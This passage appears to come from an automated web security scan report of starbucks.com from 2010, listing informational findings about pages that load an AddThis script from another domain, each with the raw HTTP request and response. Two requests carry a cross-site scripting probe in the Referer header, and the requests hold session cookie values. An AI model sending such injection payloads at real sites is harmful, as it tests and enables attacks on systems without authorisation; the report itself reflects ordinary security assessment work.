...[SNIP]...

10.11. http://www.starbucks.com/coffee/learn/flavors-in-your-cup

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/learn/flavors-in-your-cup

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coffee/learn/flavors-in-your-cup HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:56:09 GMT
Connection: close
Content-Length: 43734

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.12. http://www.starbucks.com/coffee/starbucks-natural-fusions

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-natural-fusions

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coffee/starbucks-natural-fusions HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:45:50 GMT
Connection: close
Content-Length: 52282

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.13. http://www.starbucks.com/coffee/starbucks-natural-fusions/caramel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-natural-fusions/caramel

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coffee/starbucks-natural-fusions/caramel HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:45:57 GMT
Connection: close
Content-Length: 42234

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.14. http://www.starbucks.com/coffee/starbucks-natural-fusions/cinnamon

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-natural-fusions/cinnamon

Issue detail

The response dynamically includes the following script from another domain: http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /coffee/starbucks-natural-fusions/cinnamon HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:46:07 GMT
Connection: close
Content-Length: 42276

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.15. http://www.starbucks.com/coffee/starbucks-natural-fusions/savoring

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-natural-fusions/savoring

Issue detail

The response dynamically includes the following script from another domain: http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /coffee/starbucks-natural-fusions/savoring HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:46:29 GMT
Connection: close
Content-Length: 41023

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.16. http://www.starbucks.com/coffee/starbucks-natural-fusions/vanilla

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-natural-fusions/vanilla

Issue detail

The response dynamically includes the following script from another domain: http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /coffee/starbucks-natural-fusions/vanilla HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:45:58 GMT
Connection: close
Content-Length: 42203

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.17. http://www.starbucks.com/coffee/starbucks-reserve-coffee

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-reserve-coffee

Issue detail

The response dynamically includes the following script from another domain: http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /coffee/starbucks-reserve-coffee HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:45:50 GMT
Connection: close
Content-Length: 52528

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.18. http://www.starbucks.com/coffee/starbucks-reserve-coffee/aged-sulawesi-kalosi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-reserve-coffee/aged-sulawesi-kalosi

Issue detail

The response dynamically includes the following script from another domain: http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /coffee/starbucks-reserve-coffee/aged-sulawesi-kalosi HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:43:34 GMT
Connection: close
Content-Length: 42075

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.19. http://www.starbucks.com/coffee/starbucks-reserve-coffee/brazil-sul-de-minas-peaberry

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-reserve-coffee/brazil-sul-de-minas-peaberry

Issue detail

The response dynamically includes the following script from another domain: http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /coffee/starbucks-reserve-coffee/brazil-sul-de-minas-peaberry HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.starbucks.com/?8af12"style%3d"x%3aexpression(alert(1))"9f35c014f5e=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.starbucks.com
Proxy-Connection: Keep-Alive
Cookie: ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:27:38 GMT
Content-Length: 41729

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.20. http://www.starbucks.com/coffee/starbucks-reserve-coffee/el-salvador-montecarlos-estate-pacamara

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-reserve-coffee/el-salvador-montecarlos-estate-pacamara

Issue detail

The response dynamically includes the following script from another domain: http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /coffee/starbucks-reserve-coffee/el-salvador-montecarlos-estate-pacamara HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:44:50 GMT
Connection: close
Content-Length: 42800

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.21. http://www.starbucks.com/coffee/starbucks-reserve-coffee/nicaragua-corcasan

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-reserve-coffee/nicaragua-corcasan

Issue detail

The response dynamically includes the following script from another domain: http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /coffee/starbucks-reserve-coffee/nicaragua-corcasan HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:44:54 GMT
Connection: close
Content-Length: 42642

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.22. http://www.starbucks.com/coffee/via

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/via

Issue detail

The response dynamically includes the following script from another domain: http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /coffee/via HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:45:47 GMT
Connection: close
Content-Length: 51587

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.23. http://www.starbucks.com/coffee/via/flavored-coffee

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/via/flavored-coffee

Issue detail

The response dynamically includes the following script from another domain: http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /coffee/via/flavored-coffee HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.starbucks.com/?8af12"style%3d"x%3aexpression(alert(1))"9f35c014f5e=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.starbucks.com
Proxy-Connection: Keep-Alive
Cookie: ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:27:17 GMT
Content-Length: 53500

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.24. http://www.starbucks.com/coffee/via/instant-coffee

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/via/instant-coffee

Issue detail

The response dynamically includes the following script from another domain: http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /coffee/via/instant-coffee HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:45:47 GMT
Connection: close
Content-Length: 52979

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.25. http://www.starbucks.com/coffee/whole-bean-coffee

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee

Issue detail

The response dynamically includes the following script from another domain: http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /coffee/whole-bean-coffee HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:44:59 GMT
Connection: close
Content-Length: 53283

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.26. http://www.starbucks.com/coffee/whole-bean-coffee/africa-arabia

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee/africa-arabia

Issue detail

The response dynamically includes the following script from another domain: http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /coffee/whole-bean-coffee/africa-arabia HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:19:09 GMT
Connection: close
Content-Length: 41458

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.27. http://www.starbucks.com/coffee/whole-bean-coffee/dark-and-specialty-roast

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee/dark-and-specialty-roast

Issue detail

The response dynamically includes the following script from another domain: http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /coffee/whole-bean-coffee/dark-and-specialty-roast HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:28:53 GMT
Connection: close
Content-Length: 42370

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.28. http://www.starbucks.com/coffee/whole-bean-coffee/latin-america

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee/latin-america

Issue detail

The response dynamically includes the following script from another domain: http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /coffee/whole-bean-coffee/latin-america HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:19:08 GMT
Connection: close
Content-Length: 44303

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.29. http://www.starbucks.com/coffee/whole-bean-coffee/multi-region-blends

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee/multi-region-blends

Issue detail

The response dynamically includes the following script from another domain: http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /coffee/whole-bean-coffee/multi-region-blends HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
